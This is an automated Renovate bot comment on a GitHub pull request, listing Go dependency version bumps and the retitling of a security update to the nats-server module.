renovate bot commented Dec 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 12 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

| Package | Change |
| --- | --- |
| go | 1.22 -> 1.24.0 |
| github.com/nats-io/nats.go | v1.36.0 -> v1.48.0 |
| github.com/klauspost/compress | v1.17.9 -> v1.18.3 |
| github.com/minio/highwayhash | v1.0.2 -> v1.0.4-0.20251030100505-070ab1a87a76 |
| github.com/nats-io/jwt/v2 | v2.5.7 -> v2.8.0 |
| github.com/nats-io/nkeys | v0.4.7 -> v0.4.12 |
| go.uber.org/automaxprocs | v1.5.3 -> v1.6.0 |
| golang.org/x/crypto | v0.24.0 -> v0.47.0 |
| golang.org/x/net | v0.26.0 -> v0.48.0 |
| golang.org/x/sys | v0.21.0 -> v0.40.0 |
| golang.org/x/text | v0.16.0 -> v0.33.0 |
| golang.org/x/time | v0.5.0 -> v0.14.0 |
| golang.org/x/tools | v0.21.1-0.20240508182429-e35e4ccd0d2d -> v0.40.0 |

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 69e2624 to 2765e0c Compare February 24, 2026 19:44
@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.10.27 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] Feb 24, 2026
